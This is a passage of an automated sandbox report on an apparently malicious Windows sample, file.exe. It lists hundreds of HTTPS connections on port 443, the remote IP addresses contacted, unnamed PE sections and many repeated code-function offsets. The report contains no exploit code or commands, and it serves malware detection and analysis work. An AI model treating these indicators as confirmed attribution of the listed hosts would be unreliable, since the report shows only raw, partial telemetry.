        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
        Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
        Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
        Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
        Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
        Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
        Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
        Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49703 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.7:49812 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.7:49818 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49873 version: TLS 1.2

        System Summary

        barindex
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: .idata
        Source: file.exeStatic PE information: section name:
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531511B3_3_0531511B
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053083703_3_05308370
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053083703_3_05308370
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531514B3_3_0531514B
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053080943_3_05308094
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053080943_3_05308094
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053143C83_3_053143C8
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0530BC903_3_0530BC90
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0530BC903_3_0530BC90
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0530BC903_3_0530BC90
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0530BC903_3_0530BC90
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053083703_3_05308370
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053083703_3_05308370
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0530BC903_3_0530BC90
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0530BC903_3_0530BC90
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053080943_3_05308094
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053080943_3_05308094
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151F23_3_053151F2
